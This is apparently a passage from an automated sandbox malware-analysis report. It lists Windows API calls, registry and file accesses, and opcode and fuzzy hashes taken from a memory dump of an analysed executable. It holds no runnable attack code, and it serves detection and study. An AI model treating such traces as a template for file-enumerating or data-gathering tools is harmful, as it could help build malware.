                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                    APIs
                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: EnumNamesResource
                                                                    • String ID:
                                                                    • API String ID: 3334572018-0
                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                    • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                    • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004095FC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3655998216-0
                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00445426
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                    • String ID:
                                                                    • API String ID: 1828521557-0
                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                    APIs
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                    • memcpy.MSVCRT ref: 00406942
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@FilePointermemcpy
                                                                    • String ID:
                                                                    • API String ID: 609303285-0
                                                                    • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                    • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                    APIs
                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                    • String ID:
                                                                    • API String ID: 2136311172-0
                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
